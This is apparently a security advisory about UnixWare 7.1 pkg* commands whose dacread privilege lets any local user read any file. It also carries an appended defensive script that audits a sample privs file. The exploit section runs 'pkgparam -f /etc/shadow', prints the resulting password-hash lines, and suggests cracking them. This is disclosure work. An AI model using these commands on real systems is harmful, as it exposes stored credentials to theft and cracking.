Greetings,

OVERVIEW

Any user may read any file on the system.

BACKGROUND

Only UnixWare 7.1 has been tested.

DETAILS

As previously stated, UnixWare binaries gain additional privileges via standard suid/sgid AND /etc/security/tcb/privs. The majority of the UnixWare "pkg" commands, such as pkginfo, pkgcat, pkgparam, etc., are vulnerable to a bug which allows any user to read any file on the system as a result of their additional "dacread" permission in the privs file.

The dacread permission allows a process to override the Discretionary Access Controls (DAC) for read-only operations. Basically, a process with the dacread permission is able to bypass the mode bits and ownership on a file, but only for reading it. A process with the dacwrite permission can bypass mode bits to write to or execute that file.

I'm pretty sure that the bugs I found in the pkg commands were introduced by their addition to the privs file. As far as I can tell, there is virtually no reason for them to be able to read any file on the system. All around, this additional privilege thing, well, sucks.

Consider now that the truss(1) command will allow the user to see any file I/O that happens between a process and the system, since such a process isn't suid/sgid. Thus, if there is *any* way that you can make pkg* read from a file, even if the output is never printed, you can examine the truss output to get the file's contents.

EXPLOIT

The worst offender of pkg* is pkgparam, which will print the contents of a file to stdout, though I've been able to get most of the pkg programs to read from /etc/shadow in one way or another and grab the contents with truss.
bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x 1 root sys 166784 May 21 1999 /bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow
Dy0l3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
BgusHRQZ9MH2U:10878::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
nv.Xrh2V3vArc:10882::::::
ozT.yeRe1/dxY:10882::::::
RinwpQfqabYbc:10928::::::
bash-2.02$

Now just concatenate the first field of /etc/passwd with this file and run your favorite cracker.

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net
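For administrators reviewing the privs file described above, the following audit script (added here, not part of the advisory) lists every binary that holds the dacread or dacwrite privilege, which is the set of entries worth questioning the way the author questions the pkg* ones. It assumes the privs file uses one "pathname:kind:priv[,priv...]" entry per line; confirm the exact layout against the privs(4) manual page on your system before relying on it, and it runs here against a constructed sample rather than a real /etc/security/tcb/privs.

```shell
#!/bin/sh
# Assumed entry format (verify against privs(4)): pathname:kind:priv[,priv...]
# Comment lines start with '#'; blank lines are ignored.

# Print "path kind privilege" for every privilege that overrides DAC.
list_dac_privs() {
    awk -F: '
        /^[ \t]*#/ || /^[ \t]*$/ { next }     # skip comments and blank lines
        {
            n = split($3, privs, ",")
            for (i = 1; i <= n; i++)
                if (privs[i] == "dacread" || privs[i] == "dacwrite")
                    print $1, $2, privs[i]
        }' "$1"
}

# Number of distinct binaries holding at least one DAC-override privilege.
count_dac_binaries() {
    list_dac_privs "$1" | awk '{ print $1 }' | sort -u | wc -l | tr -d ' '
}

# Constructed sample file; the pkg* entries mirror what the advisory describes.
SAMPLE_PRIVS=$(mktemp)
cat > "$SAMPLE_PRIVS" <<'EOF'
# constructed sample, not a real /etc/security/tcb/privs
/bin/pkgparam:fixed:dacread
/bin/pkginfo:fixed:dacread
/usr/bin/passwd:fixed:setuid,dacread,dacwrite
/usr/bin/ls:fixed:
EOF

# Review each line printed: does this program really need to bypass DAC?
list_dac_privs "$SAMPLE_PRIVS"
echo "binaries with DAC-override privileges: $(count_dac_binaries "$SAMPLE_PRIVS")"
```

Run it as `sh audit_privs.sh` and substitute the real privs file path for the sample to audit a live system.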